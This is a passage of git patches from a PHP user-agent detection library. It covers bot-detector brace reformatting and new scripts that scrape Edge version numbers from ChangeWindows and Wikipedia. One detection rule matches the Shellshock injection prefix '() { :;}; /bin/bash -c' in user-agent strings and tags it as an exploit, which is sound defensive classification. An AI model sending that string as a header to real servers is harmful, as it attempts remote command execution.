stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + ) { $scriptedAgent = new ScriptedAgent($ua); - if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) - { + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { return false; - } - else - { + } else { return $scriptedAgent; } - } - else - { + } else { return false; } } /** * @param bool $isChromeFrame - * * @return $this */ public function setIsChromeFrame($isChromeFrame) { 
$this->isChromeFrame = (bool)$isChromeFrame; - return $this; } @@ -270,14 +256,12 @@ public function isChromeFrame() } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ public function setIsWebkit($isWebkit) { $this->isWebkit = (bool)$isWebkit; - return $this; } @@ -305,13 +289,11 @@ public function isWebkit() /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -339,13 +321,11 @@ public function isFacebookWebView() /** * @param bool $isTwitterWebView - * * @return $this */ public function setIsTwitterWebView($isTwitterWebView) { $this->isTwitterWebView = (bool) $isTwitterWebView; - return $this; } @@ -373,13 +353,11 @@ public function isTwitterWebView() /** * @param UserAgent $userAgent - * * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -399,7 +377,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index fb54500..7de2ab0 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -236,8 +236,6 @@ public static function checkTwitterWebView() return false; } - - /** * Determine if the user is using a BlackBerry. * diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index 2cd6d84..220c3d6 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -55,7 +55,7 @@ class ScriptedAgentDetector implements DetectorInterface ); /** - * Routine to determine the browser type. + * Routine to determine the scripted agent type. 
* * @param ScriptedAgent $scriptedAgent * @param UserAgent $userAgent @@ -110,8 +110,7 @@ public static function checkRobotICQ() { //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. //But to be extra safe, also check for the russian language which the ICQ bot sets. - if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) - { + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ICQ); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://icq.com"); @@ -127,8 +126,7 @@ public static function checkRobotICQ() */ public static function checkRobotGoogle() { - if (stripos(self::$userAgentString, "Googlebot") !== false) - { + if (stripos(self::$userAgentString, "Googlebot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -138,22 +136,19 @@ public static function checkRobotGoogle() || stripos(self::$userAgentString, "Mediapartners-Google") !== false || stripos(self::$userAgentString, "Google-Adwords") !== false || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); return true; } - if (stripos(self::$userAgentString, "Google Favicon") !== false) - { + if (stripos(self::$userAgentString, "Google Favicon") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); 
self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); return true; } - if (stripos(self::$userAgentString, "Google Web Preview") !== false) - { + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); @@ -169,8 +164,7 @@ public static function checkRobotGoogle() */ public static function checkRobotBaidu() { - if (stripos(self::$userAgentString, "Baiduspider") !== false) - { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BAIDU); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -186,8 +180,7 @@ public static function checkRobotBaidu() */ public static function checkRobotFacebook() { - if (stripos(self::$userAgentString, "facebookexternalhit") !== false) - { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); @@ -203,30 +196,25 @@ public static function checkRobotFacebook() */ public static function checkRobotBing() { - - if (stripos(self::$userAgentString, "adidxbot/") !== false) - { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/bingbot.htm") !== false) - { + if 
(stripos(self::$userAgentString, "/bingbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/msnbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "BingPreview/") !== false) - { + if (stripos(self::$userAgentString, "BingPreview/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); @@ -243,8 +231,7 @@ public static function checkRobotBing() */ public static function checkRobotSlurp() { - if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) - { + if (stripos(self::$userAgentString, "Yahoo! 
Slurp") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SLURP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); @@ -260,8 +247,7 @@ public static function checkRobotSlurp() */ public static function checkRobotTwitter() { - if (stripos(self::$userAgentString, "Twitterbot/") !== false) - { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TWITTER); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); @@ -277,8 +263,7 @@ public static function checkRobotTwitter() */ public static function checkRobotSkype() { - if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) - { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SKYPE); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://www.skype.com"); @@ -301,16 +286,14 @@ public static function checkRobotW3CValidator() stripos(self::$userAgentString, "FeedValidator/") !== false || stripos(self::$userAgentString, "Jigsaw/") !== false || stripos(self::$userAgentString, "JW3C_Unicorn/") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); return true; } if (stripos(self::$userAgentString, "NING/") !== false || - stripos(self::$userAgentString, "W3C-checklink") !== false) - { + stripos(self::$userAgentString, "W3C-checklink") !== false) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); @@ -326,8 +309,7 @@ public static function checkRobotW3CValidator() */ public 
static function checkRobotYandex() { - if (stripos(self::$userAgentString, "YandexBot/") !== false) - { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::YANDEX); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); @@ -343,8 +325,7 @@ public static function checkRobotYandex() */ public static function checkRobotApple() { - if (stripos(self::$userAgentString, "AppleBot/") !== false) - { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); @@ -360,8 +341,7 @@ public static function checkRobotApple() */ public static function checkRobotPaperli() { - if (stripos(self::$userAgentString, "PaperLiBot/") !== false) - { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); @@ -377,8 +357,7 @@ public static function checkRobotPaperli() */ public static function checkRobotAhrefs() { - if (stripos(self::$userAgentString, "AhrefsBot/") !== false) - { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::AHREFS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); @@ -394,8 +373,7 @@ public static function checkRobotAhrefs() */ public static function checkRobotMJ12() { - if (stripos(self::$userAgentString, "MJ12Bot/") !== false) - { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MJ12); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); 
self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); @@ -411,8 +389,7 @@ public static function checkRobotMJ12() */ public static function checkRobotLiveLap() { - if (stripos(self::$userAgentString, "LivelapBot/") !== false) - { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); @@ -429,8 +406,7 @@ public static function checkRobotLiveLap() public static function checkRobotWebdav() { if (stripos(self::$userAgentString, "WEBDAV Client") !== false || - stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe - { + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); @@ -446,8 +422,7 @@ public static function checkRobotWebdav() */ public static function checkRobotMetaURI() { - if (stripos(self::$userAgentString, "MetaURI API/") !== false) - { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::METAURI); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); @@ -463,8 +438,7 @@ public static function checkRobotMetaURI() */ public static function checkRobotTLSProbe() { - if (stripos(self::$userAgentString, "TLSProbe/") !== false) - { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); @@ -481,8 +455,7 @@ public static 
function checkRobotTLSProbe() public static function checkRobotScoopIt() { if (stripos(self::$userAgentString, "wpif Safari") !== false - || stripos(self::$userAgentString, "imgsizer Safari") !== false) - { + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); @@ -498,8 +471,7 @@ public static function checkRobotScoopIt() */ public static function checkRobotNetcraft() { - if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) - { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); @@ -515,8 +487,7 @@ public static function checkRobotNetcraft() */ public static function checkRobotCurl() { - if (stripos(self::$userAgentString, "curl/") !== false) - { + if (stripos(self::$userAgentString, "curl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::CURL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); @@ -533,8 +504,7 @@ public static function checkRobotCurl() public static function checkRobotPython() { if (stripos(self::$userAgentString, "python-requests/") !== false || - stripos(self::$userAgentString, "python-urllib/") !== false) - { + stripos(self::$userAgentString, "python-urllib/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PYTHON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.python.org/"); @@ -550,8 +520,7 @@ public static function checkRobotPython() */ public static function checkRobotGoLang() { - if (stripos(self::$userAgentString, 
"Go-http-client") !== false) - { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOLANG); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://golang.org/"); @@ -567,8 +536,7 @@ public static function checkRobotGoLang() */ public static function checkRobotPerl() { - if (stripos(self::$userAgentString, "libwww-perl/") !== false) - { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PERL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.perl.org/"); @@ -584,8 +552,7 @@ public static function checkRobotPerl() */ public static function checkRobotWget() { - if (stripos(self::$userAgentString, "Wget/") !== false) - { + if (stripos(self::$userAgentString, "Wget/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WGET); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); @@ -601,8 +568,7 @@ public static function checkRobotWget() */ public static function checkRobotZGrab() { - if (stripos(self::$userAgentString, "zgrab/") !== false) - { + if (stripos(self::$userAgentString, "zgrab/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); @@ -618,8 +584,7 @@ public static function checkRobotZGrab() */ public static function checkRobotJava() { - if (stripos(self::$userAgentString, "Java/") !== false) - { + if (stripos(self::$userAgentString, "Java/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::JAVA); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); @@ -635,8 +600,7 @@ public static function checkRobotJava() */ public static function checkRobotShellshock() { - if 
(stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) - { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); @@ -652,8 +616,7 @@ public static function checkRobotShellshock() */ public static function checkRobotBrowershots() { - if (stripos(self::$userAgentString, "Browsershots") !== false) - { + if (stripos(self::$userAgentString, "Browsershots") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://browsershots.org/"); @@ -669,8 +632,7 @@ public static function checkRobotBrowershots() */ public static function checkRobotWhois() { - if (stripos(self::$userAgentString, "who.is bot") !== false) - { + if (stripos(self::$userAgentString, "who.is bot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WHOIS); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.who.is/"); @@ -686,8 +648,7 @@ public static function checkRobotWhois() */ public static function checkRobotMageReport() { - if (stripos(self::$userAgentString, "MageReport") !== false) - { + if (stripos(self::$userAgentString, "MageReport") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); @@ -703,8 +664,7 @@ public static function checkRobotMageReport() */ public static function checkRobotAdbeat() { - if (stripos(self::$userAgentString, "adbeat.com") !== false) - { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); 
self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); @@ -720,8 +680,7 @@ public static function checkRobotAdbeat() */ public static function checkRobotSocialrank() { - if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) - { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); @@ -737,8 +696,7 @@ public static function checkRobotSocialrank() */ public static function checkRobotGlutenFree() { - if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) - { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); @@ -754,8 +712,7 @@ public static function checkRobotGlutenFree() */ public static function checkRobotProximic() { - if (stripos(self::$userAgentString, "proximic;") !== false) - { + if (stripos(self::$userAgentString, "proximic;") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); @@ -771,8 +728,7 @@ public static function checkRobotProximic() */ public static function checkRobotUbermetrics() { - if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) - { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); @@ -788,8 +744,7 @@ public static function checkRobotUbermetrics() */ public static function checkRobotVerisign() { - if 
(stripos(self::$userAgentString, "ips-agent") !== false) - { + if (stripos(self::$userAgentString, "ips-agent") !== false) { self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); From 910f635e2b87d1a6d6028e4620e62f6d0e5f5f32 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 23:28:38 -0400 Subject: [PATCH 15/19] Added script to fetch latests edge versions from ChangeWindows --- .gitattributes | 1 + scripts/fetchEdgeVersions/ChangeWindows.php | 136 ++++++++++++++++++ scripts/fetchEdgeVersions/Wikipedia.php | 0 scripts/fetchEdgeVersions/index.php | 2 + .../fetchEdgeVersions/windowsVersions.json | 29 ++++ src/edgeVersionMap.php | 8 ++ 6 files changed, 176 insertions(+) create mode 100644 scripts/fetchEdgeVersions/ChangeWindows.php create mode 100644 scripts/fetchEdgeVersions/Wikipedia.php create mode 100644 scripts/fetchEdgeVersions/index.php create mode 100644 scripts/fetchEdgeVersions/windowsVersions.json create mode 100644 src/edgeVersionMap.php diff --git a/.gitattributes b/.gitattributes index 5b67882..b8faf42 100644 --- a/.gitattributes +++ b/.gitattributes @@ -12,3 +12,4 @@ /phpunit.xml.dist export-ignore /README.md export-ignore /ruleset.xml export-ignore +/scripts export-ignore diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php new file mode 100644 index 0000000..6f43cdc --- /dev/null +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -0,0 +1,136 @@ + 'Could not fetch current version from ChangeWindows', + 'invalid_version' => 'Windows version is invalid', + 'could_not_fetch_page' => 'Could not fetch page from ChangeWindows' + ); + + public static function fetchVersions() + { + $windowsVersions = json_decode(file_get_contents(__DIR__ . 
'/windowsVersions.json'), true); + if (!count($windowsVersions)) { + $currentVersion = explode('.', self::fetchCurrentVersion(), 2); + if (!isset($currentVersion[0])) throw new Exception(self::$errors['invalid_version']); + $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); + self::writeWindowsVersions($windowsVersions); + } else { + reset($windowsVersions); + $firstVersion = key($windowsVersions); + end($windowsVersions); + $lastVersion = key($windowsVersions); + + try { + $result = self::fetchVersion($windowsVersions, $firstVersion); + $windowsVersions = $result; + } catch (Exception $e) { + } + + $windowsVersions = self::fetchVersion($windowsVersions, $lastVersion); + self::writeWindowsVersions($windowsVersions); + } + } + + private static function fetchVersion($windowsVersions, $version) + { + $siblingVersions = self::fetchPage($version); + $windowsVersions[$version] = true; + self::writeWindowsVersions($windowsVersions); + + if (isset($siblingVersions[0]) && !isset($windowsVersions[$siblingVersions[0]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[0]); + } + + if (isset($siblingVersions[1]) && !isset($windowsVersions[$siblingVersions[1]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[1]); + } + + return $windowsVersions; + } + + private static function writeWindowsVersions($windowsVersions) + { + ksort($windowsVersions); + file_put_contents(__DIR__ . 
'/windowsVersions.json', json_encode($windowsVersions, JSON_PRETTY_PRINT)); + } + + private static function fetchCurrentVersion() + { + $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); + if (!$content) throw new Exception(self::$errors['could_not_fetch_version']); + $content = explode('class="timeline"', $content, 2); + if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + $content = explode('build"', $content[1], 2); + if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); + if (!isset($matches[1])) throw new Exception(self::$errors['could_not_fetch_version']); + return $matches[1]; + } + + private static function fetchPage($version) + { + $url = "https://changewindows.org/build/{$version}/pc"; + $content = file_get_contents($url); + $siblingVersions = self::fetchSiblingVersions($content); + self::fetchEdgeVersion($content); + return $siblingVersions; + } + + private static function fetchEdgeVersion($content) + { + preg_match('/]*> *Edge ([\d\.]*) *<\/h4>/', $content, $edge); + preg_match('/]*>EdgeHTML ([\d\.]*)<\/h4>/', $content, $edgeHtml); + + if (isset($edge[1]) && isset($edgeHtml[1])) { + self::writeEdgeVersion($edgeHtml[1], $edge[1]); + } + return null; + } + + private static function writeEdgeVersion($edgeHtml, $edge) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + if (!isset($currentVersions[$edgeHtml])) { + $currentVersions[$edgeHtml] = $edge; + ksort($currentVersions); + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . 
PHP_EOL; + } + $data = << *(\d+) * '39.15002', + '15.15007' => '39.15007', + '15.15019' => '40.15019', + '15.15063' => '40.15063', +); From d853bbc5e83a58ab48da397bedea828589fe24a3 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Wed, 12 Apr 2017 09:03:20 -0400 Subject: [PATCH 16/19] Added wikipedia as edge versions source --- scripts/fetchEdgeVersions/Wikipedia.php | 65 +++++++++++++++++++++++++ scripts/fetchEdgeVersions/index.php | 5 ++ src/edgeVersionMap.php | 62 +++++++++++++++++++++++ 3 files changed, 132 insertions(+) diff --git a/scripts/fetchEdgeVersions/Wikipedia.php b/scripts/fetchEdgeVersions/Wikipedia.php index e69de29..9f7278f 100644 --- a/scripts/fetchEdgeVersions/Wikipedia.php +++ b/scripts/fetchEdgeVersions/Wikipedia.php @@ -0,0 +1,65 @@ + 'Unable to fetch content', + 'parse_error' => 'Unable to parse content', + ); + + public static function fetch() + { + $content = file_get_contents(self::URL); + if (!$content) throw new Exception(self::$errors['fetch_error']); + $content = explode('===Release history===', $content); + if (!isset($content[1])) throw new Exception(self::$errors['parse_error']); + $table = explode('|-', $content[1]); + if (!isset($table[1])) throw new Exception(self::$errors['parse_error']); + $table = array_slice($table, 1); + $versions = array_map(array('Wikipedia', 'extractVersion'), $table); + self::writeEdgeVersions($versions); + } + + private static function extractVersion($content) + { + $lines = array_slice(array_filter( + explode(PHP_EOL, $content), + function ($val) { return trim($val) && strpos($val, '|') === 0; } + ), 0, 2); + + preg_match("/{[^}{]*Version[^}{]*\| ?([\d\.]+)}/", $lines[0], $edgeVersion); + preg_match("/\| *(\d*\.\d*)/", $lines[1], $edgeHtmlVersion); + + if (!isset($edgeVersion[1])) throw new Exception(self::$errors['parse_error']); + if (!isset($edgeHtmlVersion[1])) throw new Exception(self::$errors['parse_error']); + + return array($edgeHtmlVersion[1], $edgeVersion[1]); + } + + private static function 
writeEdgeVersions($versions) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + + foreach ($versions as $version) { + $currentVersions[$version[0]] = $version[1]; + } + ksort($currentVersions); + + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; + } + $data = << '0.10.10049', + '12.10051' => '0.11.10051', + '12.10052' => '0.11.10052', + '12.10061' => '0.11.10061', + '12.10074' => '0.11.10074', + '12.10080' => '0.11.10080', + '12.10122' => '13.10122', + '12.10130' => '15.10130', + '12.10136' => '16.10136', + '12.10149' => '19.10149', + '12.10158' => '20.10158', + '12.10159' => '20.10159', + '12.10162' => '20.10162', + '12.10166' => '20.10166', + '12.10240' => '20.10240', + '12.10512' => '20.10512', + '12.10514' => '20.10514', + '12.10525' => '20.10525', + '12.10532' => '20.10532', + '12.10536' => '20.10536', + '13.10547' => '21.10547', + '13.10549' => '21.10549', + '13.10565' => '23.10565', + '13.10572' => '25.10572', + '13.10576' => '25.10576', + '13.10581' => '25.10581', + '13.10586' => '25.10586', + '13.11082' => '25.11082', + '13.11099' => '27.11099', + '13.11102' => '28.11102', + '13.14251' => '28.14251', + '13.14257' => '28.14257', + '14.14267' => '31.14267', + '14.14271' => '31.14271', + '14.14279' => '31.14279', + '14.14283' => '31.14283', + '14.14291' => '34.14291', + '14.14295' => '34.14295', + '14.14300' => '34.14300', + '14.14316' => '37.14316', + '14.14322' => '37.14322', + '14.14327' => '37.14327', + '14.14328' => '37.14328', + '14.14332' => '37.14332', + '14.14342' => '38.14342', + '14.14352' => '38.14352', + '14.14393' => '38.14393', + '14.14901' => '39.14901', + '14.14905' => '39.14905', + '14.14915' => '39.14915', + '14.14926' => '39.14926', + '14.14931' => '39.14931', + '14.14936' => '39.14936', + '15.14942' => '39.14942', + '15.14946' => '39.14946', + '15.14951' => '39.14951', + '15.14955' => '39.14955', + '15.14959' => 
